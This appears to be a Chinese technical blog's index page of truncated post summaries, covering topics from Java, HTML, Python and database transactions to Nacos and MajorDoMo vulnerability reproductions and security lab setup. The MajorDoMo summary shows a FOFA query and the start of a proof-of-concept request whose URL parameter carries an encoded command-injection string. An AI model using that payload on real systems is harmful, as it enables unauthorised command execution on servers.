摘要:
1.漏洞原理 漏洞的核心在于 Nacos 的某些接口没有严格的权限控制,攻击者可以通过通过特定的 JSON 数据结构,远程执行恶意代码。以利用该漏洞读取敏感文件、执行系统命令。 条件:需要登录后才能利用漏洞 2.影响版本 nacos 2.3.2 nacos 2.4.0 3.环境搭建 https:// 阅读全文
摘要:
1.事务 事务(Transaction):要么都成功,要么都失败 事务原则:ACID原则(原子性(Atomicity)、一致性(Consistency)、隔离性(Isolation)、持久性(Durability)) 原子性:要么都成功,要么都失败 一致性:事务前后的数据完整性要保证一致(如,转账操 阅读全文
摘要:
UI 框架 Ant-Design:阿里巴巴出品,基于 React 的 UI 框架 ElementUI、iview、ice:饿了么出品,基于 Vue 的UI框架 Bootstrap:Twitter 推出的一个用于前端的开源工具包 AmazeUI:又叫“妹子UI”,一款 HTML5 跨屏前端框架 1.基 阅读全文
摘要:
参考:https://www.cnblogs.com/cainiao-chuanqi/p/14016644.html hacker插件下载地址:https://github.com/Mr-xn/hackbar2.1.3 以谷歌为例: 将解压后中的文件拖入谷歌扩展程序中 点击详情 找到此处,点击链接 阅读全文
摘要:
1.靶场安装 靶场下载:https://code.google.com/archive/p/owasp-hackademic-challenges/downloads 在phpstudy中搭建即可 访问页面: 2.OWASP Hackademic Challenge – Challenge 1 2. 阅读全文
摘要:
1.python2 和 python3 安装 官网地址:https://www.python.org/downloads/ 2.环境变量配置 在Path中添加: python2的安装目录:xxx\python2;xxx\python2\Scripts; python3的安装目录:xxx\python 阅读全文
摘要:
1.HTML HTML(Hyper Text Markup Language):超文本标记语言 W3C(World Wide Web Consortium):万维网联盟 标准: 结构化语言:HTML、XML 表现标准语言:CSS 行为标准:DOM、ECMAScript 2.网页基本标签 网页基本信息 阅读全文
摘要:
1.注解-Annotation 作用:解释;可被其他程序(如:编译器等)读取 格式:以“@注释名”在代码中存在,还可以添加一些参数值,如:@SUppressWarnings(value="unchecked") 2.内置注解 @Override:重写 @Deprecated:表示不建议使用 @Sup 阅读全文
摘要:
docker环境安装:https://www.runoob.com/docker/docker-tutorial.html 文库地址:https://github.com/PeiQi0/PeiQi-WIKI-Book docker search peiqipeiqi docker pull peiq 阅读全文
摘要:
影响平台 MajorDoMo < 0662e5e 漏洞复现 fofa 搜索语法:app="MajordomoSL" POC: GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7c%7c%20%28%65%63%68%6 阅读全文